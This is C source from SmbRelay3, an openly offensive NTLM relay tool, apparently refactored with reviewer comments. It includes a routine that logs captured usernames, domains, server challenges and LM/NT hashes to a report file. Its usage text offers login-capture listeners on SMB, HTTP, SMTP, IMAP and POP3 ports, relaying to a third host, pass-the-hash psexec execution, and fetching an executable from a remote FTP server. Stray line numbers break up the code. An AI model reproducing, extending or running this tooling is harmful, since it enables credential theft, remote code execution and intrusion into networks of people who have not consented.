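 * most MaxReadSize bytes into destinationBuffer.
 *
 * timeout > 0  wait at most `timeout` seconds for the reply (the socket is
 *              switched to non-blocking around the select()/recv() and put
 *              back into blocking mode before returning, on every path);
 * timeout <= 0 plain blocking recv().
 *
 * Returns the recv() result (bytes read, 0 on orderly close, -1 on error),
 * or -1 when the send failed or the reply timed out. With `debug` set, both
 * directions are hex-dumped via DumpMem().
 *
 * Changes from the original: the data is sent before the socket is made
 * non-blocking, so a large request can no longer be cut short by a
 * would-block error, and a send failure is reported instead of ignored;
 * the timeout path restores blocking mode (the original returned with the
 * socket still non-blocking, so a later timeout-less call would fail).
 */
int SendBytesAndWaitForResponse(SOCKET destination,char *source, int nBytes, char *destinationBuffer, int MaxReadSize,int timeout)
{
    int i = -1;
    fd_set fds;
    struct timeval tv;

    if (debug) {
        printf("Sending..\n");
        DumpMem(source, nBytes);
    }

    if (SendAllBytes(destination, source, nBytes) < 0) {
        return -1;
    }

    if (timeout > 0) {
        SetNonBlocking(destination, 1);
        tv.tv_sec = timeout;
        tv.tv_usec = 0;
        FD_ZERO(&fds);
        FD_SET(destination, &fds);

        i = select((int)destination + 1, &fds, 0, 0, &tv);
        if (i <= 0) {
            SetNonBlocking(destination, 0);
            return -1;
        }
    }

    i = (int)recv(destination, (char *)destinationBuffer, MaxReadSize, 0);

    if (timeout > 0) {
        SetNonBlocking(destination, 0);
    }

    if (debug) {
        printf("[*] received: %i bytes\n", i);
        DumpMem(destinationBuffer, i);
    }
    return i;
}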
00335
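/*
 * Append `text` to buf (capacity cap) at *used and advance *used.
 * Output is truncated silently at cap-1 and always NUL-terminated.
 */
static void ReportAppend(char *buf, size_t cap, size_t *used, const char *text)
{
    size_t room;
    int n;

    if (*used >= cap) {
        return;
    }
    room = cap - *used;
    n = snprintf(buf + *used, room, "%s", text);
    if (n < 0) {
        return;
    }
    /* snprintf reports the untruncated length; never advance past the terminator. */
    *used += ((size_t)n < room) ? (size_t)n : room - 1;
}

/* Append `count` bytes as two-digit lowercase hex (same output as the original's "%2.2x"). */
static void ReportAppendHex(char *buf, size_t cap, size_t *used, const unsigned char *bytes, int count)
{
    char hex[3];
    int i;

    for (i = 0; i < count; i++) {
        snprintf(hex, sizeof hex, "%02x", bytes[i]);
        ReportAppend(buf, cap, used, hex);
    }
}

/*
 * Append one captured-authentication record to lpLogFileFilename.
 *
 * Each call writes the column header line followed by one record:
 *   SourceIpAddress:Domain:Workstation:UserName:challenge:LMHASH:NTLMHASH
 * where challenge is the 8-byte server challenge and the two hashes are the
 * 24-byte LM and NT responses taken from NtlmAuthResponse at the offsets
 * the packet itself declares. Domain/Workstation/UserName come from
 * GetNTLMPacketInfo().
 *
 * Changes from the original: the log file handle is checked before use
 * (a failed fopen was dereferenced); the record is assembled with bounded
 * writes instead of sprintf/strcat into a fixed buffer; and the record now
 * ends with a newline, so consecutive records no longer run together with
 * the next header on the same line.
 *
 * NOTE(review): lmResponse.offset / ntResponse.offset come from the client
 * packet and are not bounds-checked here because the packet length is not
 * passed in; the caller must validate them against the received length.
 */
void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress,unsigned char *challenge)
{
    static const char header[] = "#SOURCEIPADDRESS:DOMAIN:WORKSTATION:USERNAME:challenge:LMHASH:NTLMHASH\n";
    char buffer[1024];
    char UserName[256];
    char Domain[256];
    char Workstation[256];
    const unsigned char *p;
    size_t used;
    int n;
    FILE *LogFile;

    LogFile = fopen(lpLogFileFilename, "a+");
    if (!LogFile) {
        printf("[-] Unable to open report file %s\n", lpLogFileFilename);
        return;
    }
    /* The header precedes every record, as in the original. */
    fputs(header, LogFile);

    GetNTLMPacketInfo(NtlmAuthResponse, UserName, Domain, Workstation, 0);

    n = snprintf(buffer, sizeof buffer, "%s:%s:%s:%s:", SourceIpAddress, Domain, Workstation, UserName);
    if (n < 0) {
        buffer[0] = '\0';
        used = 0;
    } else {
        used = ((size_t)n < sizeof buffer) ? (size_t)n : sizeof buffer - 1;
    }

    ReportAppendHex(buffer, sizeof buffer, &used, challenge, 8);
    ReportAppend(buffer, sizeof buffer, &used, ":");

    p = (const unsigned char *)NtlmAuthResponse + NtlmAuthResponse->lmResponse.offset;
    ReportAppendHex(buffer, sizeof buffer, &used, p, 24);
    ReportAppend(buffer, sizeof buffer, &used, ":");

    p = (const unsigned char *)NtlmAuthResponse + NtlmAuthResponse->ntResponse.offset;
    ReportAppendHex(buffer, sizeof buffer, &used, p, 24);
    ReportAppend(buffer, sizeof buffer, &used, "\n");

    fputs(buffer, LogFile);
    if (fclose(LogFile) != 0) {
        printf("[-] Error writing report file %s\n", lpLogFileFilename);
    }
}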
00371
00372
/*
 * End the current console line: a newline when verbose output is on,
 * otherwise a space and carriage return so the next message overwrites it.
 * The parameter shadows the file-scope `extern int verbose`.
 */
void CleanLine(int verbose)
{
    const char *tail = (verbose > 0) ? "\n" : " \r";

    fputs(tail, stdout);
}
00378
00379
/* Print the program banner (three fixed lines) to stdout. */
void Banner(void)
{
    static const char *const lines[] = {
        "SmbRelay3 - NTLM Authentication replay attacks\n",
        " (c) 2007 - 2008 Andres & Miguel Tarasco \n",
        " Web Site - http://www.tarasco.org\n\n",
    };
    size_t k;

    for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
        fputs(lines[k], stdout);
    }
}
00386
/* Print the command-line help to stdout and terminate the process with status 1. */
void usage(void)
{
    static const char *const lines[] = {
        "Usage: SMBRelay3.exe <binding> [options]\n\n",
        "Binding Parameters:\n",
        " --ListForSMBRequests (Wait for incomming connections against port 445)\n",
        " --ListForHTTPRequests (Wait for incomming connections against port 80)\n",
        " --ListForSMTPRequests (Wait for incomming connections against port 25)\n",
        " --ListForIMAPRequests (Wait for incomming connections against port 143)\n",
        " --ListForPOP3Requests (Wait for incomming connections against port 110)\n",
        " --psexec <host> <username> <password> (psexec like tool)\n",
        " --psexec <host> <username> <:NTLMHash> (psexec like tool)\n",
        "\nOptional Parameters\n",
        " --AlternativeSrcPort <port> (Listen under different Port)\n",
        " --AlternativeDstPort <port> (Connect to a different SMB Port)\n",
        " --SMBDestinationHost <host> (Replay attack against third part host)\n",
        " --SrcHostname <host> (Spoof incoming client name for Win2k (default smbrelay)\n",
        " --ftp <hostname> <port> <user> <pass> (download smrs.exe from remote ftp server)\n",
        " --v[v] (Displays verbose information )\n",
        "\n",
        "Example: smrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 8080 --SMBDestinationHost dc.mydomain.com\n",
    };
    size_t k;

    for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
        fputs(lines[k], stdout);
    }
    exit(1);
}
00414
00415